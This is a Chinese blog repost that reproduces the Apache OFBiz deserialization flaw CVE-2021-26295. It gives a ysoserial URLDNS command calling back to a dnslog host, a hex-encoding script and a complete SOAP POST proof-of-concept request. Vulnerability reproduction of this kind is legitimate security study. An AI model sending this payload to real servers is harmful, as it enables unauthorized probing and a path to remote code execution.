首页 > Web开发 > 详细

Apache OFBiz 反序列化漏洞(CVE-2021-26295 )复现

时间:2021-04-04 09:03:27      阅读:64      评论:0      收藏:0      [点我收藏+]

0x01影响范围

Apache OFBiz < 17.12.06

0x02漏洞复现步骤

ysoserial生成URLDNS利用链

java -jar ysoserial.jar URLDNS http://***.dnslog.cn > dns.ot

技术分享图片

Encode得到的dns.ot

encode脚本

import binascii

filename = ‘dns.ot‘
with open(filename, ‘rb‘) as f:
    content = f.read()
print(binascii.hexlify(content))

技术分享图片

打POC

技术分享图片

POC

POST /webtools/control/SOAPService HTTP/1.1
Host: IP:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Content-Length: 1010
Accept: */*
Content-Type: application/xml
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
    <map-HashMap>
        <map-Entry>
            <map-Key>
                <cus-obj>(ot文件解码出来的字符串)</cus-obj>
            </map-Key>
            <map-Value>
                <std-String value="(DNSlog地址)"/>
            </map-Value>
        </map-Entry>
    </map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>

DNSLOG回显

技术分享图片

Apache OFBiz 反序列化漏洞(CVE-2021-26295 )复现

原文:https://www.cnblogs.com/Stunmaker/p/14615435.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!